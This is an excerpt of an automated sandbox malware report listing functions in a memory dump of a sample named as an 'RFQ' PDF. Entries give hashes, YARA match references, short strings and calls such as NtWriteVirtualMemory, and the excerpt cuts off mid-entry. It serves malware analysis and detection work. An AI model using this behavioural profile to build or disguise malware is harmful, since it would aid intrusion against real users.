                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: i"m$k,I5
                              • API String ID: 0-782811531
                              • Opcode ID: a7ec1f2b79a8986f92e8c0900dee68b598c235213ffe96422766149166d9e293
                              • Instruction ID: c9f0a5675e4d8bcfc2ec43fe1c20c882f63770eb1a87cece49122e1ffe95f64d
                              • Opcode Fuzzy Hash: a7ec1f2b79a8986f92e8c0900dee68b598c235213ffe96422766149166d9e293
                              • Instruction Fuzzy Hash: 5522DBB2604349DFDB759F29CD857EABBB6FF95300F558129DC899B220C3309A81DB42
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 020B7C3D, Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 469COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: i"m$k,I5
                              • API String ID: 0-782811531
                              • Opcode ID: eb0417e856ac3b3452057a9404e8d0f25b2e61578eee622f0cd1b2d1cb86af72
                              • Instruction ID: b5cb07bee76f1f277e6e4feedbf8f17bc90a29abea89695fedf68c70acc8d62b
                              • Opcode Fuzzy Hash: eb0417e856ac3b3452057a9404e8d0f25b2e61578eee622f0cd1b2d1cb86af72
                              • Instruction Fuzzy Hash: 4622DAB2504349DFDB759F29CD847EABBB6FF95300F55812ADC899B220C3309A81DB42
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 020B7B41, Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 461COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: i"m$k,I5
                              • API String ID: 0-782811531
                              • Opcode ID: cf6ddba480da302c5073df3e6a939c80350840557684159b52ef74caeabc0892
                              • Instruction ID: 5f5ea6b75540f6e47c1443e82d10ce7d5c34a948c007b7b934f7ea588511e2a2
                              • Opcode Fuzzy Hash: cf6ddba480da302c5073df3e6a939c80350840557684159b52ef74caeabc0892
                              • Instruction Fuzzy Hash: 5412DBB2504349DFDB759F28CD857EABBB6FF95300F558529DC899B220C3309A81DB82
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 020B7BBD, Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 459COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: i"m$k,I5
                              • API String ID: 0-782811531
                              • Opcode ID: 888614832b74e952fc0401079a6724d391d981327e80f6ab21360bd88e7f57e9
                              • Instruction ID: ec1898e4921605738f6f1b5245a3316b730b59a77f2b35b2292097afab584813
                              • Opcode Fuzzy Hash: 888614832b74e952fc0401079a6724d391d981327e80f6ab21360bd88e7f57e9
                              • Instruction Fuzzy Hash: 5D12DBB2504349DFDB759F28CD857EABBB6FF95300F558529DC899B220C3309A81DB82
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 020B7C31, Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 459COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: i"m$k,I5
                              • API String ID: 0-782811531
                              • Opcode ID: 842589b0e98352d5df8debbbe9e38eb6dee09b1be05c859beb7b209d76880e7b
                              • Instruction ID: 10198f48debe3abd1a77d43370ae180a988bd897b25d21d7068f87bc30d709cc
                              • Opcode Fuzzy Hash: 842589b0e98352d5df8debbbe9e38eb6dee09b1be05c859beb7b209d76880e7b
                              • Instruction Fuzzy Hash: E512EAB2604349DFDB759F28CD847EABBB6FF95300F558529DC899B220C3309A81DB42
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 020B7D31, Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 457COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: i"m$k,I5
                              • API String ID: 0-782811531
                              • Opcode ID: f16971345551e1b1c0bcf08f93edbbf7fa310c1ba86bdda4caeff7f3e6dd2fa2
                              • Instruction ID: 11c1ba81f03b84bc1146bcea8dad3b7f7c735c9474928e7432d97d405dc0295a
                              • Opcode Fuzzy Hash: f16971345551e1b1c0bcf08f93edbbf7fa310c1ba86bdda4caeff7f3e6dd2fa2
                              • Instruction Fuzzy Hash: 7B12DB72604389DFDB769F25CD847EABBB6FF95300F558419DC899B224C3309A81DB82
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 020B7C85, Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 455COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: i"m$k,I5
                              • API String ID: 0-782811531
                              • Opcode ID: 9a53fd563669ac749e47e335c82a87f4bd15904f1a09cb5d830f7b1c6c54f176
                              • Instruction ID: 08e8241bd23e91f5538f4397a9aa73795eb009986c5f4d6495a84096c2d04084
                              • Opcode Fuzzy Hash: 9a53fd563669ac749e47e335c82a87f4bd15904f1a09cb5d830f7b1c6c54f176
                              • Instruction Fuzzy Hash: C212EB72504389DFDB759F29CD847EABBB6FF95300F158529DC899B220C3309A81DB42
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 020B7CA9, Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 453nativeCOMMON
                              Download Yara Rule
                              APIs
                              • NtWriteVirtualMemory.NTDLL(?,7246379C,?,00000000,?), ref: 020B889B
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID: MemoryVirtualWrite
                              • String ID: i"m$k,I5
                              • API String ID: 3527976591-782811531
                              • Opcode ID: 17386f568e33fd0d2404d218c8c01b82a77602d4ee00bf393ff06264e1721396
                              • Instruction ID: dc7ecd727e844b4f2a827e74b2f1a3202bea1785ec5cdc46934a95890fdad70e
                              • Opcode Fuzzy Hash: 17386f568e33fd0d2404d218c8c01b82a77602d4ee00bf393ff06264e1721396
                              • Instruction Fuzzy Hash: 0912DA72504349DFDB759F28CD857EABBB6FF95300F558129DC899B220C3309A81DB82
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 020B7C7A, Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 433nativeCOMMON
                              Download Yara Rule
                              APIs
                              • NtWriteVirtualMemory.NTDLL(?,7246379C,?,00000000,?), ref: 020B889B
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID: MemoryVirtualWrite
                              • String ID: i"m$k,I5
                              • API String ID: 3527976591-782811531
                              • Opcode ID: 1ebaa314a52d5138aed510007cf53b0ab7bd422dac92c5491a7d1bbec87bca0e
                              • Instruction ID: 869a097183aa72603482ecd5c6865be2c2ac34ab0f1041819e55c94ec3b83a26
                              • Opcode Fuzzy Hash: 1ebaa314a52d5138aed510007cf53b0ab7bd422dac92c5491a7d1bbec87bca0e
                              • Instruction Fuzzy Hash: 5D12CA72504389DFDB759F25CD847EABBB6FF95300F558529DC899B220C3309A81DB82
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 020BEF41, Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 205libraryfilenativeCOMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID: FileLibraryLoadOpen
                              • String ID: P(5^${{IY
                              • API String ID: 228343584-2445343677
                              • Opcode ID: 1ecd9271e19eb793a70452cc2264d232f6ab9872d68015dfd0878ff108d0680a
                              • Instruction ID: b50fbeeb227b582b017be0d01bfa65e9b2fee32c9115c2847d2c1ae757718984
                              • Opcode Fuzzy Hash: 1ecd9271e19eb793a70452cc2264d232f6ab9872d68015dfd0878ff108d0680a
                              • Instruction Fuzzy Hash: C081113150834ACFCB76DE78CD987EE77A2BF58310F51462AEC0A9BA14D3709681DB42
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 020B1A15, Relevance: 4.0, Strings: 3, Instructions: 233COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: $k*$Ct*w$q``
                              • API String ID: 0-340753632
                              • Opcode ID: d2deed6cc48abb64571d8eb4bdeca7abbb284fecf953a50fcc0ff2198b75dd76
                              • Instruction ID: 99dcd26b694e5e20e84bd61ba3a4bd6486a9abae2958695eaa6b0b0fcb45b9da
                              • Opcode Fuzzy Hash: d2deed6cc48abb64571d8eb4bdeca7abbb284fecf953a50fcc0ff2198b75dd76
                              • Instruction Fuzzy Hash: 2C81CA76D08399CFCB368F3488283D97BB5EF52310F25496BD9589BB46C3B04A12D785
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 020B7D25, Relevance: 3.9, APIs: 1, Strings: 1, Instructions: 424COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: k,I5
                              • API String ID: 0-2335973621
                              • Opcode ID: e78ab23767f107f1bd948d0fb170700469072f1af3bca05994c47788706e237a
                              • Instruction ID: 41c052f47f31f5b8745d635180721e5b4de0628a95e6e60bc0372b896940b78d
                              • Opcode Fuzzy Hash: e78ab23767f107f1bd948d0fb170700469072f1af3bca05994c47788706e237a
                              • Instruction Fuzzy Hash: 9212C972504389DFDB759E29CD847EEBBB6BF95300F15852ADC899B220C3309A81DB42
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 020B7E79, Relevance: 3.9, APIs: 1, Strings: 1, Instructions: 420COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: k,I5
                              • API String ID: 0-2335973621
                              • Opcode ID: 43d41f65a06ee7801e0a94a02b447723a7119f1f9e083f3c0d0d68e50a543121
                              • Instruction ID: 0f24a3e96f4fcceb22413fb480a0eb94d2411fea6dd3dde6852a3eebdb1fff5a
                              • Opcode Fuzzy Hash: 43d41f65a06ee7801e0a94a02b447723a7119f1f9e083f3c0d0d68e50a543121
                              • Instruction Fuzzy Hash: 0A02CD72504389DFDB769E29CD847EEBBB6FF95300F558429DC899B220C3708A85DB42
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 020B7E59, Relevance: 3.9, APIs: 1, Strings: 1, Instructions: 400COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: k,I5
                              • API String ID: 0-2335973621
                              • Opcode ID: c50cffa19ec56bee3a3185ce5d731555617aea2598fc1dffb19846ef94795dd8
                              • Instruction ID: 43c805c5aa9d60fcf52d76bb5927b8aac8deb6d24fb3430dc7624b0bf4a3c1be
                              • Opcode Fuzzy Hash: c50cffa19ec56bee3a3185ce5d731555617aea2598fc1dffb19846ef94795dd8
                              • Instruction Fuzzy Hash: BC02DC72504388DFDB769E29CC887EE7BB6EF95300F558029DC899B224C3308A85DB42
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 020B7E65, Relevance: 3.9, APIs: 1, Strings: 1, Instructions: 399COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: k,I5
                              • API String ID: 0-2335973621
                              • Opcode ID: f320362633419855d0370b46447a067000025fefaa56aa1d1bc9b122721020e9
                              • Instruction ID: 2ab674e774e3626f56314e0c55eeee1345fa70783e45ca566808c45c2c966d19
                              • Opcode Fuzzy Hash: f320362633419855d0370b46447a067000025fefaa56aa1d1bc9b122721020e9
                              • Instruction Fuzzy Hash: 4002DD72504389DFDB769E29CD887EE7BB6FF95300F558029DC899B224C3308A85DB42
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 020B7E40, Relevance: 3.9, APIs: 1, Strings: 1, Instructions: 396nativeCOMMON
                              Download Yara Rule
                              APIs
                              • NtWriteVirtualMemory.NTDLL(?,7246379C,?,00000000,?), ref: 020B889B
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID: MemoryVirtualWrite
                              • String ID: k,I5
                              • API String ID: 3527976591-2335973621
                              • Opcode ID: 09b4cffcaa056d720fe7eec47777d2705063920adb704482e28335e395b9168a
                              • Instruction ID: 51049044e329c14f025443cc2040135ae8897de7afacfcaf55de7e7d29514aef
                              • Opcode Fuzzy Hash: 09b4cffcaa056d720fe7eec47777d2705063920adb704482e28335e395b9168a
                              • Instruction Fuzzy Hash: 4002CB72604389DFDB759E29CD847EE7BB6FF95300F55842ADC899B224C3308A85DB42
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 020B7E47, Relevance: 3.9, APIs: 1, Strings: 1, Instructions: 396nativeCOMMON
                              Download Yara Rule
                              APIs
                              • NtWriteVirtualMemory.NTDLL(?,7246379C,?,00000000,?), ref: 020B889B
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID: MemoryVirtualWrite
                              • String ID: k,I5
                              • API String ID: 3527976591-2335973621
                              • Opcode ID: 8fe4876676ef99a06f5f28d59eed0dccdda6ee2bd13a74c22d4b655177e42a44
                              • Instruction ID: d9a663e49046fe3c532fdd5c36463c70f19bd66ee18a36629f4b67ef791be2f7
                              • Opcode Fuzzy Hash: 8fe4876676ef99a06f5f28d59eed0dccdda6ee2bd13a74c22d4b655177e42a44
                              • Instruction Fuzzy Hash: E502CB72604389DFDB759E29CD847EE7BB6FF95300F55842ADC899B224C3308A85DB42
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 020B7EC2, Relevance: 3.9, APIs: 1, Strings: 1, Instructions: 396nativeCOMMON
                              Download Yara Rule
                              APIs
                              • NtWriteVirtualMemory.NTDLL(?,7246379C,?,00000000,?), ref: 020B889B
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID: MemoryVirtualWrite
                              • String ID: k,I5
                              • API String ID: 3527976591-2335973621
                              • Opcode ID: 99f7df19674b219ecbb7ba01c3d50b14f5f6d5999d1432cb4c827d4cd71bab86
                              • Instruction ID: 373d40c81eb7080df73238be311c7ff81526c1522a7b26211c51b6814c1e1886
                              • Opcode Fuzzy Hash: 99f7df19674b219ecbb7ba01c3d50b14f5f6d5999d1432cb4c827d4cd71bab86
                              • Instruction Fuzzy Hash: BD02CB72604389DFDB759E29CD847EE7BB6FF95300F558429DC899B224C3308A85DB42
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 020B7FA5, Relevance: 3.9, APIs: 1, Strings: 1, Instructions: 372nativeCOMMON
                              Download Yara Rule
                              APIs
                              • NtWriteVirtualMemory.NTDLL(?,7246379C,?,00000000,?), ref: 020B889B
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID: MemoryVirtualWrite
                              • String ID: k,I5
                              • API String ID: 3527976591-2335973621
                              • Opcode ID: dc49aa3117380dd986e4d75b1b3049c732c669fff3ffc9b70ca676be2a4b361c
                              • Instruction ID: 6d273ee9f8099f29f0f95e5de6e1bcb231776492fbc74a4777b2a03e5d54b091
                              • Opcode Fuzzy Hash: dc49aa3117380dd986e4d75b1b3049c732c669fff3ffc9b70ca676be2a4b361c
                              • Instruction Fuzzy Hash: 7CF1CB72504388DFDB769E29CD887EE7BB6FFA5300F558419DC899B224C3708A85DB42
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 020B7F3D, Relevance: 3.9, APIs: 1, Strings: 1, Instructions: 367COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: k,I5
                              • API String ID: 0-2335973621
                              • Opcode ID: e150ee729e413f9758de70c38f238bcc2f544f2d33413a31dc145a2b4ae5f43f
                              • Instruction ID: fb6fa946b15a838a079add498c29d0ae86bac5dc5afeb5f0cb94334b54cff272
                              • Opcode Fuzzy Hash: e150ee729e413f9758de70c38f238bcc2f544f2d33413a31dc145a2b4ae5f43f
                              • Instruction Fuzzy Hash: ABF1CC72504388DFDB769E29CD887EE7BB6FF95300F55841ADC899B224C3708A85DB42
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 020B7F31, Relevance: 3.9, APIs: 1, Strings: 1, Instructions: 367COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: k,I5
                              • API String ID: 0-2335973621
                              • Opcode ID: de7947aefff5a750913a268fa8dc63cc2a2cc076a6600d04488c11688ad59a11
                              • Instruction ID: 66a85b066554044fe02cf4df7eab103d2d4bbd7ce43a0a32ca9eaacec4c81088
                              • Opcode Fuzzy Hash: de7947aefff5a750913a268fa8dc63cc2a2cc076a6600d04488c11688ad59a11
                              • Instruction Fuzzy Hash: 40F1CB72504388DFDB769E29CD887EE7BB6FF95300F558429DC899B224C3708A85DB42
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 020B8031, Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 342nativeCOMMON
                              Download Yara Rule
                              APIs
                              • NtWriteVirtualMemory.NTDLL(?,7246379C,?,00000000,?), ref: 020B889B
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID: MemoryVirtualWrite
                              • String ID: k,I5
                              • API String ID: 3527976591-2335973621
                              • Opcode ID: 504e326a58bb1195853fd3121242e2acc7cce0f087c095a416fea02e7a866d86
                              • Instruction ID: 4dee54c951cf09c0663eccd5f0185fbbaaf2466b3484b373790f850930fc21f1
                              • Opcode Fuzzy Hash: 504e326a58bb1195853fd3121242e2acc7cce0f087c095a416fea02e7a866d86
                              • Instruction Fuzzy Hash: 7FE1CB72504388DFDB769E29CD847EE7BB6FF95300F158419DC899B224D3708A85DB42
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 020B7F81, Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 337COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: k,I5
                              • API String ID: 0-2335973621
                              • Opcode ID: f362bb5c373ba44955bd14e29eb32ae0b66bde7fda97d516897e24ba225291ef
                              • Instruction ID: 9b15ca29478ecf776c4ef340e4d9e30968d2332824b88b6a285eadb2b23bd3aa
                              • Opcode Fuzzy Hash: f362bb5c373ba44955bd14e29eb32ae0b66bde7fda97d516897e24ba225291ef
                              • Instruction Fuzzy Hash: 84E1DD72504388DFDB769E29CD887EE7BB6FFA5300F558019DC899B220C3708A85DB42
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 020B8129, Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 320COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: k,I5
                              • API String ID: 0-2335973621
                              • Opcode ID: 5302b0623c9234b64e408a0f9ba04ca2dd36121b3331a9f4970370b153207d53
                              • Instruction ID: 36cb77d99c602685175965359f86458427cea7d401550cecaa1c159d9e0542bc
                              • Opcode Fuzzy Hash: 5302b0623c9234b64e408a0f9ba04ca2dd36121b3331a9f4970370b153207d53
                              • Instruction Fuzzy Hash: A0E1BD72504389DFDB769E29CD887EE7BB6FF95300F55841ADC899B220C3708A45DB42
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0040131C, Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 307COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.770490258.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.770486988.0000000000400000.00000002.00020000.sdmp Download File
                              • Associated: 00000000.00000002.770501826.000000000041A000.00000004.00020000.sdmp Download File
                              • Associated: 00000000.00000002.770509272.000000000041C000.00000002.00020000.sdmp Download File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_RFQ 001030112021#U00b7pdf.jbxd
                              Similarity
                              • API ID: #100
                              • String ID: VB5!6&*
                              • API String ID: 1341478452-3593831657
                              • Opcode ID: 31935f492be6669080ab2b72b8212a0d7e5acbcd5e229674b541cec66ec66cfb
                              • Instruction ID: c506bda7e32fe1794bd0ab3c8f2bc4e7e3f1d639bc27914b9c493189fee7c084
                              • Opcode Fuzzy Hash: 31935f492be6669080ab2b72b8212a0d7e5acbcd5e229674b541cec66ec66cfb
                              • Instruction Fuzzy Hash: C291637204E7C19FD7138B7499A55A57FB0AE5332431A05EBC4C2CF8B3D22D191AD72A
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 020B81B9, Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 304COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: k,I5
                              • API String ID: 0-2335973621
                              • Opcode ID: bceb2aada4e1650fb63edf4bf2d14dadf3c04e047a24a2a0b18e7d1b1321c35c
                              • Instruction ID: 1838b7881dec92a899c09ffa6d7a71d4d895beabebc761b01a9053c1cb441ac8
                              • Opcode Fuzzy Hash: bceb2aada4e1650fb63edf4bf2d14dadf3c04e047a24a2a0b18e7d1b1321c35c
                              • Instruction Fuzzy Hash: 2CD1CE72544388DFDB769E28CD887DE7BB6FF55340F19802ADC899B220C3709A45DB46
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 020B8091, Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 301COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: k,I5
                              • API String ID: 0-2335973621
                              • Opcode ID: d1920e835eaa4f88df5d1efe42474307f3213b37af726ca1cc28a2009cad2f9c
                              • Instruction ID: e4ddac3ae3c8fedfdf3e74b65304792d8d7849364cb7b900c063f64a82ed0125
                              • Opcode Fuzzy Hash: d1920e835eaa4f88df5d1efe42474307f3213b37af726ca1cc28a2009cad2f9c
                              • Instruction Fuzzy Hash: C1D1CD72544388DFDB769E28CD887EE7BB6FF55340F19801ADC899B220C3709A45DB42
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 020B8105, Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 300COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: k,I5
                              • API String ID: 0-2335973621
                              • Opcode ID: 4802853d0e47a3457a678c16d6f8e3a5fe4ef30512d219ec97ff929364026036
                              • Instruction ID: b2fd0303fd6951d33e5372e373dd8f02598853036ca2dc14ccf467d7e68f5d41
                              • Opcode Fuzzy Hash: 4802853d0e47a3457a678c16d6f8e3a5fe4ef30512d219ec97ff929364026036
                              • Instruction Fuzzy Hash: 1FD1CC72544388DFDB769E28CD887EE7BB6FF55340F59802ADC899B220C3709A45DB42
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 020B809D, Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 299COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: k,I5
                              • API String ID: 0-2335973621
                              • Opcode ID: 6182174ddf156b8bb8f67336e987dcb0ef3b8a89da37d295db65e9adfd99ba94
